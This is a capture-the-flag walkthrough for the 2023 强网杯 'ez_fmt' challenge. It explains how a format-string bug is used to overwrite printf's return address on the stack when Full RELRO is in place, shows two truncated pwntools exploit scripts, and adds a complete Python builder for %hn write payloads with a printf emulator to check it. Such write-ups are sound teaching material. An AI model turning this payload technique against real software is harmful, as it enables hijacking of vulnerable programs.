[强网杯2023] 强网先锋 ez_fmt detailed walkthrough (2023-12-19)

Challenge walkthrough

First check the binary's mitigations. Address randomization is off for the binary itself (no PIE), so its code, including the gadgets used later, sits at fixed addresses:

Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      No PIE
...

Full RELRO makes the GOT read-only, so the format-string write cannot target a GOT entry; the target used in this exploit is printf's own return address on the stack, which is why the exploit first needs a stack address leak. NX rules out injected shellcode, so control flow is redirected through existing code (the csu gadget and magic_read).
The exploit is posted first; readers who want to debug and understand it on their own can work through it.

from pwn import *

context(
    terminal=['tmux', 'splitw', '-h'],
    os="linux",
    arch="amd64",
    # arch = "i386",
    log_level="debug",
)
io = process('./ez_fmt')

def debug():
    # The gdb script runs `ni` right after attaching, so gdb steps once
    # automatically and the state right after the input is visible immediately.
    gdb.attach(io, '''
    ni
    ''')

debug()
...
A second exploit script (also truncated here):

from pwn import *

context.log_level = 'debug'
context.arch = 'amd64'
# sh = remote('2.2.2.2', 1337)
# sh = gdb.debug('./ez_fmt', 'b main')
sh = process('./ez_fmt')
elf = ELF('./ez_fmt')
# Full RELRO makes the GOT read-only, but its entries can still be read
got_libc_startmain = elf.got['__libc_start_main']

# the first line the program prints carries the stack address leak
recv1 = sh.recvline()
stack_addr = int(recv1[24:38], ...
io.interactive()

ez_fmt

The format string overwrites printf's return address with part of the csu (ret2csu) gadget; execution then jumps to magic_read (0x401205), which runs the ROP chain.

#!/usr/bin/env python3
'''
Author: 7resp4ss
Date: 2023-12-16 13:34:34
Usage:
    Debug  : python3 exp.py debug elf-file-path -t -b malloc
    Remote : python3 exp.py remote ...
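The write described above, overwriting printf's return address with 2-byte %hn stores because Full RELRO rules out the GOT, can be built by hand rather than with pwntools' fmtstr_payload. The block below is an added example written for this page, not code from the writeup or from 7resp4ss: it builds the payload for a given positional offset and checks it against a small emulator of the printf conversions the payload uses, so the layout (conversions first, NUL-containing addresses last, 8-byte alignment, index fixed point) can be verified offline. The offset 6, the stack slot 0x7ffdf1a2b3c8 and the gadget 0x4011c0 are constructed values, not the challenge's real ones; in the real exploit the slot is derived from the leaked stack_addr and the gadget from the csu code.

```python
import re
import struct


def p64(value):
    """Pack a 64-bit little-endian integer (same as pwntools' p64)."""
    return struct.pack("<Q", value)


def build_fmt_write(offset, writes, printed=0):
    """Build a format string that stores each 8-byte value at its address.

    offset  -- positional index at which the first 8 bytes of our buffer
               appear as a printf argument (what `%<offset>$p` echoes back)
    writes  -- {addr: value}; every value becomes four 2-byte %hn stores
    printed -- characters printf has already output before our format string

    Layout: [%Nc%K$hn ...][pad to 8][addr0][addr1]...  Addresses go last
    because x86-64 addresses contain NUL bytes, which would otherwise end
    the format string before the conversions are reached.
    """
    chunks = []
    for addr, value in writes.items():
        for i in range(4):
            chunks.append((addr + 2 * i, (value >> (16 * i)) & 0xFFFF))
    # Smallest 16-bit values first keeps padding low; the modulo below
    # handles the wraparound when a later value is smaller anyway.
    chunks.sort(key=lambda c: c[1])

    fmt_len = 0
    while True:  # indices depend on the format length, so iterate to a fixed point
        first_idx = offset + fmt_len // 8   # positional index of chunks[0]'s address
        count = printed
        fmt = b""
        for j, (_, val) in enumerate(chunks):
            need = (val - count) % 0x10000   # characters still to print before this %hn
            if need:
                fmt += b"%%%dc" % need       # %Nc outputs N characters
                count += need
            fmt += b"%%%d$hn" % (first_idx + j)
        padded = len(fmt) + (-len(fmt) % 8)  # keep the address table 8-byte aligned
        if padded == fmt_len:
            break
        fmt_len = padded
    return fmt.ljust(fmt_len, b"A") + b"".join(p64(a) for a, _ in chunks)


_SPEC = re.compile(rb"%(\d*)(\$)?(hh|h|ll|l)?([cn])")


def simulate_printf(payload, offset, mem, printed=0):
    """Emulate the printf subset the payload relies on (%Nc and the %n family)
    against a fake stack where `payload` starts at positional argument
    `offset`.  Stores land in `mem` (addr -> byte).  Returns the output count."""
    fmt = payload.split(b"\x00", 1)[0]    # printf stops at the first NUL

    def arg(k):
        i = k - offset                    # which 8-byte slot of our buffer, if any
        if i < 0:
            return 0                      # register/stack arguments we do not control
        return struct.unpack("<Q", payload[8 * i:8 * i + 8].ljust(8, b"\x00"))[0]

    count, pos, next_seq = printed, 0, 1
    for m in _SPEC.finditer(fmt):
        count += m.start() - pos          # literal bytes before this conversion
        pos = m.end()
        num, dollar, length, conv = m.groups()
        if dollar:
            k = int(num)                  # explicit %K$ index
        else:                             # glibc numbers non-$ conversions separately
            k, next_seq = next_seq, next_seq + 1
        if conv == b"c":
            count += max(int(num), 1) if (num and not dollar) else 1
        else:                             # %n family: store `count` at *arg(k)
            addr = arg(k)
            size = {None: 4, b"hh": 1, b"h": 2, b"l": 8, b"ll": 8}[length]
            for i in range(size):
                mem[addr + i] = (count >> (8 * i)) & 0xFF
    return count + (len(fmt) - pos)       # trailing literal bytes (the address table)


def read_qword(mem, addr):
    """Reassemble 8 bytes from the fake memory (missing bytes read as 0)."""
    return int.from_bytes(bytes(mem.get(addr + i, 0) for i in range(8)), "little")


# Constructed demo values (assumptions, not the challenge's real numbers):
RET_SLOT = 0x7FFDF1A2B3C8   # stack slot holding printf's return address
GADGET = 0x4011C0           # value to plant there (a csu gadget in the real exploit)
FMT_OFFSET = 6              # first 8 bytes of input echo back at %6$p


def demo():
    mem = {}
    payload = build_fmt_write(FMT_OFFSET, {RET_SLOT: GADGET})
    simulate_printf(payload, FMT_OFFSET, mem)
    return payload, read_qword(mem, RET_SLOT)


if __name__ == "__main__":
    payload, planted = demo()
    print(payload)
    print(hex(planted))
```

The emulator follows glibc's argument numbering: conversions without `$` draw from their own sequential counter, so the `%Nc` padding conversions consume arguments 1, 2, ... while every `%K$hn` names its address slot explicitly. pwntools' `fmtstr_payload(offset, {addr: value}, write_size='short')` produces a payload of the same shape; building it by hand makes it clear why the leaked stack address matters (it is what the address table points at) and why the format part must stay NUL-free.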